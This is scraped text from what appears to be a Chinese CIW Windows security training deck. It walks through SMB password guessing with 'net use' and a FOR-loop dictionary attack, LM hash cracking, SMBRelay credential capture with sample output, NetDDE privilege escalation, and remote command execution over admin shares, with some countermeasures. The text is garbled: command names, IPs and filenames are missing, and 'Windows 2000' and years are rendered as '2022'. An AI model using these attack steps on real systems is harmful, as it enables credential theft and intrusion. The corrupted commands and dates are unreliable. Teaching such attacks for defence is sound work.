ciw-windows系统安全(200607)-资料下载页

　　

【正文】 获取的信息 ， 见到过在这个字段中以明文的形式写出的密码 。 那些不愿意记住复杂密码的 “ 不幸的 ” 用户经常在注释字段中有很多提示 ， 其有助于密码猜测  Administrators组或 Domain Admins组的成员 这些账户通常是攻击者的目标 ， 因为它们拥有本地系统或域的至高无上的权限 。 同时 ， 使用 Microsoft的默认工具不能锁定本地的Administrator账户 ， 这使得它成为连续密码猜测攻击的目标 回顾扫描结果  共享的组账户 大多数组织都倾向于在给定环境中的大部分系统上重用账户凭据 。例如类似于 backup(备份 )或 admin(管理 )这样的账户名称 。 这些账户的密码通常都比较容易猜测  最近一定时期内没有修改过密码的账户 这通常表明用户和系统管理员对账户维护工作的不重视 ， 有可能导致潜在的危险 。 这些账户也可能会使用在创建该账户时指定的默认密码 ， 这是很容易猜出的 (通常会使用单位的名称 ， 或者是Wele(欢迎 )等单词 ）  最近一定时期内没有登录过的账户 同样 ， 使用频率很低的账户也是维护工作的疏忽所导致的 ， 它们的密码通常也比较容易猜出 避免账户锁定－探测锁定 阈 值  Enum – p  Guest帐户猜测 在 Windows 2022上 ， Guest账户在默认情况下是被禁用的 ，但是如果你达到了锁定阈值 ， 你仍然能够收到提示 Guest猜测  C:\ use \\\ipc$ * /u:guest Type the password for \\mgmgrand\ipc$: System error 1326 has occurred. Logon failure: unknown user name or bad password.  C:\ use \\\ipc$ * /u:guest Type the password for \\mgmgrand\ipc$: System error 1909 has occurred. The referenced account is currently locked out and may not be logged on to. Guest猜测  在猜测 Guest(或其他账户 )的密码时 ， 需要注意的另外一件事是如果你确实猜对了一个已经被禁用账户的密码 ， 那么将会出现另一种不同的错误消息： C:\ use \\\ipc$ * /u:guest Type the password for \\mgmgrand\ipc$: System error 1331 has occurred. Logon failure: account currently disabled.  在 Windows 2022中 ， Guest账户的密码默认为空 。 于是 ， 如果你连续地以空密码来猜测 Guest账户 ， 那么永远也不会达到锁定阈值 (除非密码被人为修改过 ) 开始攻击 猜测 SMB密码 手工 SMB密码猜测 C:\ use \\\ipc$ password /u:\username System error 1326 has occurred. Logon failure: unknown user name or bad password. 可能的用户名密码组合 (做字典，直接使用 Xsa测试） 使用 For循环字典攻击 创建字典 C:\echo administrator administrator password administrator administrator 使用 For循环字典攻击 猜测 C:\FOR /F tokens=1,2* %i in ()^ More? do use \\\IPC$ %j /u:\%i^ More? 2nul^ More? amp。amp。 echo %time% %date% ^ More? amp。amp。 echo \\ acct: %i pass: %j 使用 For循环字典攻击 查看猜测结果 C:\type 11:53: Wed 05/09/2022 \\ acct: administrator pass: 自动攻击工具 NAT SMBGrind Fgrind 对策  实施密码复杂性要求  账户锁定  启用登录失败事件的审核  查看事件日志  锁定真正的 Administrator账户并创建一个假目标  禁用闲置账户  仔细核查管理人员 开始攻击 窃听 SMB认证 窃听方法 直接从网络电缆上嗅探 SMB凭据 使用欺骗性服务器捕获 SMB凭据 中间人 (Maninthemiddle， MITM)攻击 LAN Manager的口令散列 微软在 Windows NT 和 2022系统里缺省安装了LAN Manager口令散列 由于 LAN Manager使用的加密机制比微软现在的方法脆弱 ， LAN Manager的口令能在很短的时间内被破解 。 即使是强健的口令散列也能在一个月内破解掉 LAN Manager的口令散列机制 长的口令被截成 14个字符  短的口令被填补空格变成 14个字符 口令中所有的字符被转换成大写 口令被分割成两个 7个字符的片断 LAN Manager的口令散列机制  LM算法是从账户密码的两个独立的 7个字符分段创建用户的散列的  前 8个字节来自于用户密码的前 7个字符 ， 随后的 8个字节来自于密码的第 8~14个字符 LAN Manager的口令散列机制  每块都可以通过对所有可能的 8字节组合进行穷举攻击而猜出  攻击全部的 8字节 “ 字符空间 ” 对于现代的桌面计算机处理器来说是很轻松的事情  如果攻击者能够发现用户的 LM散列 ， 那么他们最终破解得到实际的明文密码就很可能了 LC4phtcrack L0phtcrack的局限性  只能从共享介质中捕获质询 应答通信  目前还不能从两个 Windows 2022系统间的登录交换中获取散列  通过网络监听破解质询 应答散列所需的时间随着添加的密码散列数量而线性增长  在使用 SMBCapture之前 ， WinPcap 程序必须成功安装和运行  目前还不能从 NTLMv2质询 应答通信中得到散列 欺骗－ 将 SMB登录重定向到攻击者  假设攻击者能够欺骗用户连接到他所指定的 SMB服务器上去 ， 捕获 LM应答就变得容易多  L0phtcrack的早期版本中曾经建议了一种最基本的欺骗方法：向目标用户发送一封电子邮件 ， 其中嵌入假冒的 SMB服务器的超级链接 。 用户收到这封邮件 ， 单击超级链接 (手动的或自动的 )， 客户端会在不受注意的情况下将该用户的SMB凭据通过网络发送  这样的超级链接很容易伪装 ， 而且通常只需要与用户进行很少的交互 ， 因为如果没有明确提供其他认证信息的话 ,Windows会自动尝试以当前用户的身份登录 对策  确保遵守网络安全的最佳操作准则 。 在受到保护的网络中使用 SMB服务 ， 确保全部的网络基础设施不允许SMB通信到达不受信任的结点上  配置网络中所有的 Windows系统 ， 禁止 LM散列在网络中的传播 禁止发送 LM散列 使用 SMBRelay捕获 SMB认证  SMBRelay实际上是一个 SMB服务器 ， 它能够从到来的SMB通信中收集用户名和密码散列  顾名思义 ， SMBRelay不仅能够实现虚假的 SMB终端的功能 —— 在特定的情况下 ， 它还能够进行中间人 (maninthemiddle， MITM)攻击 建立假的 SMB服务器 C:\smbrelay /E SMBRelay ?TCP (NetBT) level SMB maninthemiddle relay attack Copyright 2022: Sir Dystic, Cult of the Dead Cow Send plaints, ideas and donations to [2] ETHERNET CSMACD ?3Com 10/100 Mini PCI Ether Adapter [1] SOFTWARE LOOPBACK ?MS TCP Loopback interface 启动假的 SMB服务器 C:\smbrelay /IL 2 /IR 2 ；在序号为 2的网络接口上建立 SMBRelay ?TCP (NetBT) level SMB maninthemiddle relay attack Copyright 2022: Sir Dystic, Cult of the Dead Cow Send plaints, ideas and donations to Using relay adapter index 2: 3Com EtherLink PCI 等待并捕获 SMB连接 Connection from :1526 …… Request type: Session Message 137 bytes …… Username: administrator Domain: CAESARSTS OS: Windows 2022 2195 Lanman type: Windows 2022 Password hash written to disk 权限提升 NetDDE 权限提升  权限提升通常是指提升当前用户账户的能力 ， 达到具有更 高 权 限 的 账 户 ， 通 常 是 超 级 用 户 ， 例如Administrator或 SYSTEM的过程  从恶意黑客的角度来说 ， 获取一个普通账户 ， 然后进行权限提升攻击 ， 比远程进行攻击直接获取超级用户权限要容易得多  不管在哪种情况下 ， 无论他达到了什么特权级别 ， 通过认证的攻击者都比未通过认证时要有很多达到目的的选择 作为 SYSTEM身份运行的 NetDDE  2022年 2月 ， @stake的 Dildog发现了 Windows 2022的网络动态数据交换服务 (Network Dynamic Data Exchange Service， NetDDE)中的一个漏洞 ， 这个漏洞允许本地用户以 SYSTEM特权运行任意的命令  NetDDE是使应用程序通过 “ 受信任的共享 ” 来共享数据的一种技术 。 通过受信任的共享 ， 可以发出请求执行应用程序 ， 并运行在 SYSTEM账户的上下文中 获得交互 命令行控制 GUI控制 交互方式  一旦攻击者获取了对 Windows 2022系统的管理访问 ， 几乎没有什么方法能够阻止他 将带来的损害 。 很少有攻击者会满足于他所获得的 “ 管理 ” 成就并满意地离开 。 相反 ， 他总会进一步企图获取交互式的控制  交互控制是查看系统的内部工作状态并任意执行命令的能力 ， 就像物理上坐在系统前面一样 。 在 Windows世界中 ， 这可以通过两种方式之一来实现：通过命令行界面 ， 例如类似于 tel的连接 ， 或者通过图形化的界面 ， 例如 PCAnywhere、 Microsoft终端服务器或其他类似的远程控制产品  当然 ， 攻击者不会希望使用这种重量级的技术 ， 他们需要的是小的 、易于隐藏的控制方法 命令行控制   Net use (直接使用 )  Windows NT/2022 Resource Kit 式 要使用 Windows系统的命令行控制 ， 你必须进行如下步骤的操作： 1. 与目标之间创建管理连接： C:\ use \\\ipc$ password /u:administrator 2. 将一个驱动器映射到管理共享 C$： C:\ use * \\\c$ Drive D: is now connected to \\\c$. The mand pleted successfully. 3. 将 ： C:\copy d:\winnt\system32 4. 调用 sc命令启动计划任务服务： C:\sc \\ start schedule 5. 确定远程系统上的时间： C:\ time \\ at命令启动